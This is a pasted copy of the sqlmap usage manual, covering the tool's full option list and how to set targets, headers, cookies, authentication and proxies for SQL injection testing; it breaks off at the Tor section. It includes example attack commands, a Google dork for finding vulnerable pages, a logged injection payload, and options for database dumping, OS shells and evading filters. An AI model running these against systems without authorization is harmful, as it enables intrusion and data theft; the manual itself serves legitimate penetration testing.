· 5 years ago · Jun 20, 2020, 05:48 PM
1# Usage
2
3```
4Usage: python sqlmap.py [options]
5
6Options:
7 -h, --help Show basic help message and exit
8 -hh Show advanced help message and exit
9 --version Show program's version number and exit
10 -v VERBOSE Verbosity level: 0-6 (default 1)
11
12 Target:
13 At least one of these options has to be provided to define the
14 target(s)
15
16 -d DIRECT Connection string for direct database connection
17 -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
18 -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
19 -m BULKFILE Scan multiple targets given in a textual file
20 -r REQUESTFILE Load HTTP request from a file
21 -g GOOGLEDORK Process Google dork results as target URLs
22 -c CONFIGFILE Load options from a configuration INI file
23
24 Request:
25 These options can be used to specify how to connect to the target URL
26
27 --method=METHOD Force usage of given HTTP method (e.g. PUT)
28 --data=DATA Data string to be sent through POST (e.g. "id=1")
29 --param-del=PARA.. Character used for splitting parameter values (e.g. &)
30 --cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
31 --cookie-del=COO.. Character used for splitting cookie values (e.g. ;)
32 --load-cookies=L.. File containing cookies in Netscape/wget format
33 --drop-set-cookie Ignore Set-Cookie header from response
34 --user-agent=AGENT HTTP User-Agent header value
35 --random-agent Use randomly selected HTTP User-Agent header value
36 --host=HOST HTTP Host header value
37 --referer=REFERER HTTP Referer header value
38 -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
39 --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")
40 --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI)
41 --auth-cred=AUTH.. HTTP authentication credentials (name:password)
42 --auth-file=AUTH.. HTTP authentication PEM cert/private key file
43 --ignore-code=IG.. Ignore (problematic) HTTP error code (e.g. 401)
44 --ignore-proxy Ignore system default proxy settings
45 --ignore-redirects Ignore redirection attempts
46 --ignore-timeouts Ignore connection timeouts
47 --proxy=PROXY Use a proxy to connect to the target URL
48 --proxy-cred=PRO.. Proxy authentication credentials (name:password)
49 --proxy-file=PRO.. Load proxy list from a file
50 --tor Use Tor anonymity network
51 --tor-port=TORPORT Set Tor proxy port other than default
52 --tor-type=TORTYPE Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
53 --check-tor Check to see if Tor is used properly
54 --delay=DELAY Delay in seconds between each HTTP request
55 --timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
56 --retries=RETRIES Retries when the connection timeouts (default 3)
57 --randomize=RPARAM Randomly change value for given parameter(s)
58 --safe-url=SAFEURL URL address to visit frequently during testing
59 --safe-post=SAFE.. POST data to send to a safe URL
60 --safe-req=SAFER.. Load safe HTTP request from a file
61 --safe-freq=SAFE.. Test requests between two visits to a given safe URL
62 --skip-urlencode Skip URL encoding of payload data
63 --csrf-token=CSR.. Parameter used to hold anti-CSRF token
64 --csrf-url=CSRFURL URL address to visit for extraction of anti-CSRF token
65 --force-ssl Force usage of SSL/HTTPS
66 --hpp Use HTTP parameter pollution method
67 --eval=EVALCODE Evaluate provided Python code before the request (e.g.
68 "import hashlib;id2=hashlib.md5(id).hexdigest()")
69
70 Optimization:
71 These options can be used to optimize the performance of sqlmap
72
73 -o Turn on all optimization switches
74 --predict-output Predict common queries output
75 --keep-alive Use persistent HTTP(s) connections
76 --null-connection Retrieve page length without actual HTTP response body
77 --threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
78
79 Injection:
80 These options can be used to specify which parameters to test for,
81 provide custom injection payloads and optional tampering scripts
82
83 -p TESTPARAMETER Testable parameter(s)
84 --skip=SKIP Skip testing for given parameter(s)
85 --skip-static Skip testing parameters that not appear to be dynamic
86 --param-exclude=.. Regexp to exclude parameters from testing (e.g. "ses")
87 --dbms=DBMS Force back-end DBMS to provided value
88 --dbms-cred=DBMS.. DBMS authentication credentials (user:password)
89 --os=OS Force back-end DBMS operating system to provided value
90 --invalid-bignum Use big numbers for invalidating values
91 --invalid-logical Use logical operations for invalidating values
92 --invalid-string Use random strings for invalidating values
93 --no-cast Turn off payload casting mechanism
94 --no-escape Turn off string escaping mechanism
95 --prefix=PREFIX Injection payload prefix string
96 --suffix=SUFFIX Injection payload suffix string
97 --tamper=TAMPER Use given script(s) for tampering injection data
98
99 Detection:
100 These options can be used to customize the detection phase
101
102 --level=LEVEL Level of tests to perform (1-5, default 1)
103 --risk=RISK Risk of tests to perform (1-3, default 1)
104 --string=STRING String to match when query is evaluated to True
105 --not-string=NOT.. String to match when query is evaluated to False
106 --regexp=REGEXP Regexp to match when query is evaluated to True
107 --code=CODE HTTP code to match when query is evaluated to True
108 --text-only Compare pages based only on the textual content
109 --titles Compare pages based only on their titles
110
111 Techniques:
112 These options can be used to tweak testing of specific SQL injection
113 techniques
114
115 --technique=TECH SQL injection techniques to use (default "BEUSTQ")
116 --time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
117 --union-cols=UCOLS Range of columns to test for UNION query SQL injection
118 --union-char=UCHAR Character to use for bruteforcing number of columns
119 --union-from=UFROM Table to use in FROM part of UNION query SQL injection
120 --dns-domain=DNS.. Domain name used for DNS exfiltration attack
121 --second-url=SEC.. Resulting page URL searched for second-order response
122 --second-req=SEC.. Load second-order HTTP request from file
123
124 Fingerprint:
125 -f, --fingerprint Perform an extensive DBMS version fingerprint
126
127 Enumeration:
128 These options can be used to enumerate the back-end database
129 management system information, structure and data contained in the
130 tables. Moreover you can run your own SQL statements
131
132 -a, --all Retrieve everything
133 -b, --banner Retrieve DBMS banner
134 --current-user Retrieve DBMS current user
135 --current-db Retrieve DBMS current database
136 --hostname Retrieve DBMS server hostname
137 --is-dba Detect if the DBMS current user is DBA
138 --users Enumerate DBMS users
139 --passwords Enumerate DBMS users password hashes
140 --privileges Enumerate DBMS users privileges
141 --roles Enumerate DBMS users roles
142 --dbs Enumerate DBMS databases
143 --tables Enumerate DBMS database tables
144 --columns Enumerate DBMS database table columns
145 --schema Enumerate DBMS schema
146 --count Retrieve number of entries for table(s)
147 --dump Dump DBMS database table entries
148 --dump-all Dump all DBMS databases tables entries
149 --search Search column(s), table(s) and/or database name(s)
150 --comments Check for DBMS comments during enumeration
151 -D DB DBMS database to enumerate
152 -T TBL DBMS database table(s) to enumerate
153 -C COL DBMS database table column(s) to enumerate
154 -X EXCLUDE DBMS database identifier(s) to not enumerate
155 -U USER DBMS user to enumerate
156 --exclude-sysdbs Exclude DBMS system databases when enumerating tables
157 --pivot-column=P.. Pivot column name
158 --where=DUMPWHERE Use WHERE condition while table dumping
159 --start=LIMITSTART First dump table entry to retrieve
160 --stop=LIMITSTOP Last dump table entry to retrieve
161 --first=FIRSTCHAR First query output word character to retrieve
162 --last=LASTCHAR Last query output word character to retrieve
163 --sql-query=QUERY SQL statement to be executed
164 --sql-shell Prompt for an interactive SQL shell
165 --sql-file=SQLFILE Execute SQL statements from given file(s)
166
167 Brute force:
168 These options can be used to run brute force checks
169
170 --common-tables Check existence of common tables
171 --common-columns Check existence of common columns
172
173 User-defined function injection:
174 These options can be used to create custom user-defined functions
175
176 --udf-inject Inject custom user-defined functions
177 --shared-lib=SHLIB Local path of the shared library
178
179 File system access:
180 These options can be used to access the back-end database management
181 system underlying file system
182
183 --file-read=FILE.. Read a file from the back-end DBMS file system
184 --file-write=FIL.. Write a local file on the back-end DBMS file system
185 --file-dest=FILE.. Back-end DBMS absolute filepath to write to
186
187 Operating system access:
188 These options can be used to access the back-end database management
189 system underlying operating system
190
191 --os-cmd=OSCMD Execute an operating system command
192 --os-shell Prompt for an interactive operating system shell
193 --os-pwn Prompt for an OOB shell, Meterpreter or VNC
194 --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC
195 --os-bof Stored procedure buffer overflow exploitation
196 --priv-esc Database process user privilege escalation
197 --msf-path=MSFPATH Local path where Metasploit Framework is installed
198 --tmp-path=TMPPATH Remote absolute path of temporary files directory
199
200 Windows registry access:
201 These options can be used to access the back-end database management
202 system Windows registry
203
204 --reg-read Read a Windows registry key value
205 --reg-add Write a Windows registry key value data
206 --reg-del Delete a Windows registry key value
207 --reg-key=REGKEY Windows registry key
208 --reg-value=REGVAL Windows registry key value
209 --reg-data=REGDATA Windows registry key value data
210 --reg-type=REGTYPE Windows registry key value type
211
212 General:
213 These options can be used to set some general working parameters
214
215 -s SESSIONFILE Load session from a stored (.sqlite) file
216 -t TRAFFICFILE Log all HTTP traffic into a textual file
217 --answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
218 --base64=BASE64P.. Parameter(s) containing Base64 encoded data
219 --batch Never ask for user input, use the default behavior
220 --binary-fields=.. Result fields having binary values (e.g. "digest")
221 --check-internet Check Internet connection before assessing the target
222 --crawl=CRAWLDEPTH Crawl the website starting from the target URL
223 --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
224 --csv-del=CSVDEL Delimiting character used in CSV output (default ",")
225 --charset=CHARSET Blind SQL injection charset (e.g. "0123456789abcdef")
226 --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE)
227 --encoding=ENCOD.. Character encoding used for data retrieval (e.g. GBK)
228 --eta Display for each output the estimated time of arrival
229 --flush-session Flush session files for current target
230 --forms Parse and test forms on target URL
231 --fresh-queries Ignore query results stored in session file
232 --har=HARFILE Log all HTTP traffic into a HAR file
233 --hex Use hex conversion during data retrieval
234 --output-dir=OUT.. Custom output directory path
235 --parse-errors Parse and display DBMS error messages from responses
236 --preprocess=PRE.. Use given script(s) for preprocessing of response data
237 --repair Redump entries having unknown character marker (?)
238 --save=SAVECONFIG Save options to a configuration INI file
239 --scope=SCOPE Regexp to filter targets from provided proxy log
240 --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW)
241 --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK)
242 --update Update sqlmap
243
244 Miscellaneous:
245 -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
246 --alert=ALERT Run host OS command(s) when SQL injection is found
247 --beep Beep on question and/or when SQL injection is found
248 --cleanup Clean up the DBMS from sqlmap specific UDF and tables
249 --dependencies Check for missing (optional) sqlmap dependencies
250 --disable-coloring Disable console output coloring
251 --gpage=GOOGLEPAGE Use Google dork results from specified page number
252 --identify-waf Make a thorough testing for a WAF/IPS protection
253 --list-tampers Display list of available tamper scripts
254 --mobile Imitate smartphone through HTTP User-Agent header
255 --offline Work in offline mode (only use session data)
256 --purge Safely remove all content from sqlmap data directory
257 --skip-waf Skip heuristic detection of WAF/IPS protection
258 --smart Conduct thorough tests only if positive heuristic(s)
259 --sqlmap-shell Prompt for an interactive sqlmap shell
260 --tmp-dir=TMPDIR Local directory for storing temporary files
261 --web-root=WEBROOT Web server document root directory (e.g. "/var/www")
262 --wizard Simple wizard interface for beginner users
263```
264
265## Output verbosity
266
267Option: `-v`
268
269This option can be used to set the verbosity level of output messages. There exist **seven** levels of verbosity. The default level is **1** in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed.
270
271* **0**: Show only Python tracebacks, error and critical messages.
272* **1**: Show also information and warning messages.
273* **2**: Show also debug messages.
274* **3**: Show also payloads injected.
275* **4**: Show also HTTP requests.
276* **5**: Show also HTTP responses' headers.
277* **6**: Show also HTTP responses' page content.
278
279A reasonable level of verbosity to further understand what sqlmap does under the hood is level **2**, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level **3** is your best choice. This level is also recommended to be used when you feed the developers with a potential bug report, make sure you send along with the standard output the traffic log file generated with option `-t`.
280In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level **4** or above. It should be noted that there is also a possibility to set the verbosity by using the shorter version of this option where number of letters `v` inside the provided switch (instead of option) determines the verbosity level (e.g. `-v` instead of `-v 2`, `-vv` instead of `-v 3`, `-vvv` instead of `-v 4`, etc.)
281
282## Target
283
284At least one of these options has be provided to set the target(s).
285
286### Direct connection to the database
287
288Option: `-d`
289
290Run sqlmap against a single database instance. This option accepts a connection string in one of following forms:
291
292* `DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME` (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.)
293* `DBMS://DATABASE_FILEPATH` (SQLite, Microsoft Access, Firebird, etc.)
294
295For example:
296
297```
298$ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --bann\
299er --dbs --users
300```
301
302### Target URL
303
304Option: `-u` or `--url`
305
306Run sqlmap against a single target URL. This option requires a target URL in following form:
307
308`http(s)://targeturl[:port]/[...]`
309
310For example:
311
312```
313$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs -\
314-users
315```
316
317### Parse targets from Burp or WebScarab proxy logs
318
319Option: `-l`
320
321Rather than providing a single target URL, it is possible to test and inject against HTTP requests proxied through [Burp proxy](http://portswigger.net/suite/) or
322[WebScarab proxy](http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project). This option requires an argument which is the proxy's HTTP requests log file.
323
324### Scan multiple targets enlisted in a given textual file
325
326Option: `-m`
327
328Providing list of target URLs enlisted in a given bulk file, sqlmap will scan
329each of those one by one.
330
331Sample content of a bulk file provided as an argument to this option:
332
333 www.target1.com/vuln1.php?q=foobar
334 www.target2.com/vuln2.asp?id=1
335 www.target3.com/vuln3/id/1*
336
337### Load HTTP request from a file
338
339Option: `-r`
340
341One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way you can skip usage of a number of other options (e.g. setting of cookies, POSTed data, etc).
342
343Sample content of a HTTP request file provided as an argument to this option:
344
345 POST /vuln.php HTTP/1.1
346 Host: www.target.com
347 User-Agent: Mozilla/4.0
348
349 id=1
350
351Note that if the request is over HTTPS, you can use this in conjunction with switch `--force-ssl` to force SSL connection to 443/tcp. Alternatively, you can append `:443` to the end of the `Host` header value.
352
353### Process Google dork results as target addresses
354
355Option: `-g`
356
357It is also possible to test and inject on GET parameters based on results of your Google dork.
358
359This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.
360
361For example:
362
363```
364$ python sqlmap.py -g "inurl:\".php?id=1\""
365```
366
367### Load options from a configuration INI file
368
369Option: `-c`
370
371It is possible to pass user's options from a configuration INI file, an example is `sqlmap.conf`.
372
373Note that if you provide other options from command line, those are evaluated when running sqlmap and overwrite those provided in the configuration file.
374
375## Request
376
377These options can be used to specify how to connect to the target URL.
378
379### HTTP method
380
381Option: `--method`
382
383sqlmap automatically detects the proper HTTP method to be used in HTTP requests. Nevertheless, in some cases, it is required to force the usage of specific HTTP method (e.g. `PUT`) that is not used by automatism. This is possible with usage of this option (e.g. `--method=PUT`).
384
385### HTTP data
386
387Option: `--data`
388
389By default the HTTP method used to perform HTTP requests is GET, but you can implicitly change it to POST by providing the data to be sent in the POST requests. Such data, being those parameters, are tested for SQL injection as well as any provided GET parameters.
390
391For example:
392
393```
394$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banne\
395r --dbs --users
396```
397
398### Parameter splitting character
399
400Option: `--param-del`
401
402There are cases when default parameter delimiter (e.g. `&` in GET and POST data) needs to be overwritten for sqlmap to be able to properly split and process each parameter separately.
403
404For example:
405
406```
407$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=\
4081" --param-del=";" -f --banner --dbs --users
409```
410
411### HTTP `Cookie` header
412
413Options and switch: `--cookie`, `--cookie-del`, `--load-cookies` and `--drop-set-cookie`
414
415These options and switches can be used in two situations:
416
417* The web application requires authentication based upon cookies and you have such data.
418* You want to detect and exploit SQL injection on such header values.
419
420Either reason brings you to need to send cookies with sqlmap requests, the steps to go through are the following:
421
422* Login to the application with your favourite browser.
423* Get the HTTP Cookie from the browser's preferences or from the HTTP proxy screen and copy to the clipboard.
424* Go back to your shell and run sqlmap by pasting your clipboard as value of the option `--cookie`.
425
426Note that the HTTP `Cookie` header values are usually separated by a `;` character, **not** by an `&`. sqlmap can recognize these as separate sets of `parameter=value` too, as well as GET and POST parameters. In case that the separation character is other than `;` it can be specified by using option `--cookie-del`.
427
428If at any time during the communication, the web application responds with `Set-Cookie` headers, sqlmap will automatically use its value in all further HTTP requests as the `Cookie` header. sqlmap will also automatically test those values for SQL injection. This can be avoided by providing the switch `--drop-set-cookie` - sqlmap will ignore any coming `Set-Cookie` header.
429
430Vice versa, if you provide a HTTP `Cookie` header with option `--cookie` and the target URL sends an HTTP
431`Set-Cookie` header at any time, sqlmap will ask you which set of cookies to use for the following HTTP requests.
432
433There is also an option `--load-cookies` which can be used to provide a special file containing Netscape/wget formatted cookies.
434
435Note that also the HTTP `Cookie` header is tested against SQL injection if the `--level` is set to **2** or above. Read below for details.
436
437### HTTP `User-Agent` header
438
439Option and switch: `--user-agent` and `--random-agent`
440
441By default sqlmap performs HTTP requests with the following `User-Agent` header value:
442
443 sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)
444
445However, it is possible to fake it with the option `--user-agent` by providing custom User-Agent as the option's argument.
446
447Moreover, by providing the switch `--random-agent`, sqlmap will randomly select a `User-Agent` from the `./txt/user-agents.txt` textual file and use it for all HTTP requests within the session.
448
449Some sites perform a server-side check of HTTP `User-Agent` header value and fail the HTTP response if a valid `User-Agent` is not provided, its value is not expected or is blacklisted by a web application firewall or similar intrusion prevention system. In this case sqlmap will show you a message as follows:
450
451 [hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to
452 force the HTTP User-Agent header with option --user-agent or --random-agent
453
454Note that also the HTTP `User-Agent` header is tested against SQL injection if the `--level` is set to **3** or above.
455Read below for details.
456
457### HTTP `Host` header
458
459Option: `--host`
460
461You can manually set HTTP `Host` header value. By default HTTP `Host` header is parsed from a provided target URL.
462
463Note that also the HTTP `Host` header is tested against SQL injection if the `--level` is set to **5**. Read below for details.
464
465### HTTP `Referer` header
466
467Option: `--referer`
468
469It is possible to fake the HTTP `Referer` header value. By default **no** HTTP `Referer` header is sent in HTTP requests if not explicitly set.
470
471Note that also the HTTP `Referer` header is tested against SQL injection if the `--level` is set to **3** or above. Read below for details.
472
473### Extra HTTP headers
474
475Option: `--headers`
476
477It is possible to provide extra HTTP headers by setting the option `--headers`. Each header must be separated by a newline and it is much easier to provide them from the configuration INI file. You can take a look at the sample `sqlmap.conf` file for such case.
478
479Example against a MySQL target:
480
481```
482$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \
483"ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
484[...]
485[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
486GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
487OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\
488%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
48920%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
4900%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
491%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
49220%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
4930%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
494%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
49520%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
4960%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
497%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\
49820%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
4990%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
500%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
50120%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
5020%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
503%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
50420%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
5050%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
506%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
50720%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\
5080x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
509CTER_SETS%20GROUP%20BY%20x%29a%
51029 HTTP/1.1
511Host: www.target.com
512Accept-encoding: gzip,deflate
513Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
514User-agent: Firefox 1.0
515Connection: close
516[...]
517```
518
519### HTTP protocol authentication
520
521Options: `--auth-type` and `--auth-cred`
522
523These options can be used to specify which HTTP protocol authentication back-end web server implements and the valid credentials to be used to perform all HTTP requests to the target application.
524
525The three supported HTTP protocol authentication mechanisms are:
526
527* `Basic`
528* `Digest`
529* `NTLM`
530
531While the credentials' syntax is `username:password`.
532
533Example of valid syntax:
534
535```
536$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\
537=1" --auth-type Basic --auth-cred "testuser:testpass"
538```
539
540### HTTP protocol private key authentication
541
542Option: `--auth-file`
543
544This option should be used in cases when the web server requires proper client-side certificate and a private key for authentication. Supplied value should be a PEM formatted `key_file` that contains your certificate and a private key.
545
546Example of generation of a `key_file.txt` that is compatible with `--auth-file`:
547```
548$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout auth_file.key -out auth_file.pem &&\
549cat auth_file.key auth_file.pem > auth_file.txt && cat auth_file.txt
550Generating a 2048 bit RSA private key
551.........+++
552...........+++
553writing new private key to 'auth_file.key'
554-----
555You are about to be asked to enter information that will be incorporated
556into your certificate request.
557What you are about to enter is what is called a Distinguished Name or a DN.
558There are quite a few fields but you can leave some blank
559For some fields there will be a default value,
560If you enter '.', the field will be left blank.
561-----
562Country Name (2 letter code) [AU]:
563State or Province Name (full name) [Some-State]:
564Locality Name (eg, city) []:
565Organization Name (eg, company) [Internet Widgits Pty Ltd]:
566Organizational Unit Name (eg, section) []:
567Common Name (e.g. server FQDN or YOUR name) []:
568Email Address []:
569-----BEGIN PRIVATE KEY-----
570MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCWM28J1ua2DINf
571VLU28oeJwQidL9vTRoGJR5pfBU6Mhu33Cv6RuVEJAfMWEKYDSbqbrEyy1zUiNTcG
572mEd026Peq0SPRvsKsVb6K+EHVF3r+6ExXHEctPRbh2GIzi2kCQMkdHDg+DhmieQ9
5739Haxk9IREJZTo2vC1ohvM5M/yubw4iwgMlDaW+4s82OgOcCLjewbPLFZU5gMV+8W
574XLKUttUYwV79duPbEvG9S1soNFHhu/MOcNiKJpH2zSegd9Dk5/OJRGX5xEiv7AyL
5754shQLpAqn5kuZcm2K+ib/4x/Rw2yT1Slh2tQIi8RcwlYyycOrSqvhW7vvdqkblbY
576mQQyR2ChAgMBAAECggEBAIqvMveC1cOCCksbi7cQeNVYxvtcFT0e/LwkwQS7gat/
577anmQTT2APrJyemEFPkQK76KNlMQMsaLEP+p28IOVydjvin5Aq8tTs1uK6Fw8Kfya
578elt5X3eCHZ3lgskuljW/nIcsfI08o9cJuxT5hB6yvmPDTQos+nMMYy1KEcv1LQd8
579Y+QAmVQqMF5Nyf8Q6op6hWZIIJY5NDbRE0zYzhGcHWg2798Dx1sO0HT6TD8cNP8H
580AVp/V21tzpmFpe0A7NajgYEjkij6fg+6mG0j0WZdWymYXDeiTdDpwzs/SPRevBLn
581Okp/6vqtdekMeYL591MNBl8GRZpJW9gNLRX7vQ6YYAECgYEAxGV9e85GpLUd/uUb
5821MvGajd+HtN/uoWH1ySG34vi3q/dDKBehry2yoDUosxXf9vbH0IrvaXnO8yXGflS
583wb2TELLezGWbw6kPaw2XIgL4elO5TPh2rNJwz1wOhv3FT2XSGJbXx/CED3mL7MGs
584qwRU/bRrNV7RmzV2veThlLCLjZECgYEAw8jm7vOzQQnqEjs0wlfJmzOyFqilYvEP
5858v7HxDv1M7e7M0TqLECET9VlQE5spGuzEWN7/iMtE8xxnz2n/vGnGAV8qv1LJYrA
586TWQMTIC6V9/jKM8wNOfT7Eh1rJ1cty87yokXpy/cdmkv7yxb1b2zuBk8/1nlYqA0
5875uqb345eWhECgYEAmoXv0TVfR8BpNWA2IZujJXc7+C0YVj0xwAixRbneaq+cEI8t
588UH2ypGnw45Y7UhI9ub5qg/DAmsBCMuGER4NM7tqNiex4Pd4Kj4RF4TDNKBIvvWvQ
589k/GPaNdZZsTMNcg7IbWtWVbX0QUlHsbTgEsMRAFsSLWt3ZyXLJmlE0REyMECgYEA
590oCqEscrwRC7GLK/+01ZZ+fvqnxrMYgrvj0zbRDAAwpR2MtUX9ae6Fk1vDZKa0k/B
591KGKIlzlTsTS5ZxpbivdKSR6EBKY+ibHe6/EDFrrgtu7TuRj2SPG2rz//9Hyv0rRz
592Z5eLoBxJcR1QN4vEfTE6C0uqWQPD4lFJtfcMGXEwwuECgYAK+4gwPBlrKClrRtDc
5937Fnq8RLYeZRbM5WEmTHfRnlYylniMsj2K20H8ln8pdOqCE4iJn0SezIQIaAtcwMP
594WQt15kgJgLwM/uBtqDeWRpTEotVMFXQbZImobjpXUhTqu0NWBwbypM/zarfRWPJ4
595fJkrlA16caVj3qGaX1lkm06OAA==
596-----END PRIVATE KEY-----
597-----BEGIN CERTIFICATE-----
598MIIDXTCCAkWgAwIBAgIJALTHPlkIs/+KMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
599BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
600aWRnaXRzIFB0eSBMdGQwHhcNMTgwODIyMDc0NTQxWhcNMTkwODIyMDc0NTQxWjBF
601MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
602ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
603CgKCAQEAljNvCdbmtgyDX1S1NvKHicEInS/b00aBiUeaXwVOjIbt9wr+kblRCQHz
604FhCmA0m6m6xMstc1IjU3BphHdNuj3qtEj0b7CrFW+ivhB1Rd6/uhMVxxHLT0W4dh
605iM4tpAkDJHRw4Pg4ZonkPfR2sZPSERCWU6NrwtaIbzOTP8rm8OIsIDJQ2lvuLPNj
606oDnAi43sGzyxWVOYDFfvFlyylLbVGMFe/Xbj2xLxvUtbKDRR4bvzDnDYiiaR9s0n
607oHfQ5OfziURl+cRIr+wMi+LIUC6QKp+ZLmXJtivom/+Mf0cNsk9UpYdrUCIvEXMJ
608WMsnDq0qr4Vu773apG5W2JkEMkdgoQIDAQABo1AwTjAdBgNVHQ4EFgQUVvHI/2qF
609kmRCEWlWB+ZvJzWTnUkwHwYDVR0jBBgwFoAUVvHI/2qFkmRCEWlWB+ZvJzWTnUkw
610DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAg5tmkM75/NEEymu0ublj
611c2R1/ZxwbKMjg98KxLqGFJbPVRG0qgIy+uc+Gvh6FEgPF22i4L9DROfuDQW3YSJ6
612x3JnJxLsU+jjXxtN7hNwoQziQkicKr0y47TjqOKLlBlKTbdnr74nJXSYQhi4qEFE
613qgrUG7ScitgLvcf2sDVf9L2SUsH5iRK+HlgYEtSKhUl5SkLapcUUF+GmectUOkm7
614m7Z8gelenVUerLojnQL2avKD07hWTTGkgX2PV8hdun0WIvBLWAcJN+6T9sdakJZZ
615qJjFQBXjcxwgVe0vB0vJmqa5lj9OymQnBMjp+3zpUtDJNH2M1qySbU6tGEX1wsW/
616VA==
617-----END CERTIFICATE-----
618```
619
620### Ignore (problematic) HTTP error code
621
622Option `--ignore-code`
623
624In case that you want to test the site that occasionally returns HTTP error code that causes problems to regular sqlmap run (e.g. 401 (Unauthorized)), while you want to ignore it and continue on with tests, you can use option `--ignore-code`
625
626### HTTP(S) proxy
627
628Options and switch: `--proxy`, `--proxy-cred`, `--proxy-file` and `--ignore-proxy`
629
630It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S) requests to the target URL with option `--proxy`. The syntax of HTTP(S) proxy value is `http://url:port`.
631
632If the HTTP(S) proxy requires authentication, you can provide the credentials in the format `username:password` to the
633option `--proxy-cred`.
634
635In case that you want to use (disposable) proxy list, skipping to the next proxy on any sign of a connection problem (e.g. blocking of invasive IP address), option `--proxy-file` can be used by providing filename of a file containing bulk list of proxies.
636
637Switch `--ignore-proxy` should be used when you want to run sqlmap against a target part of a local area network by ignoring the system-wide set HTTP(S) proxy server setting.
638
639### Tor anonymity network
640
641Switches and options: `--tor`, `--tor-port`, `--tor-type` and `--check-tor`
642
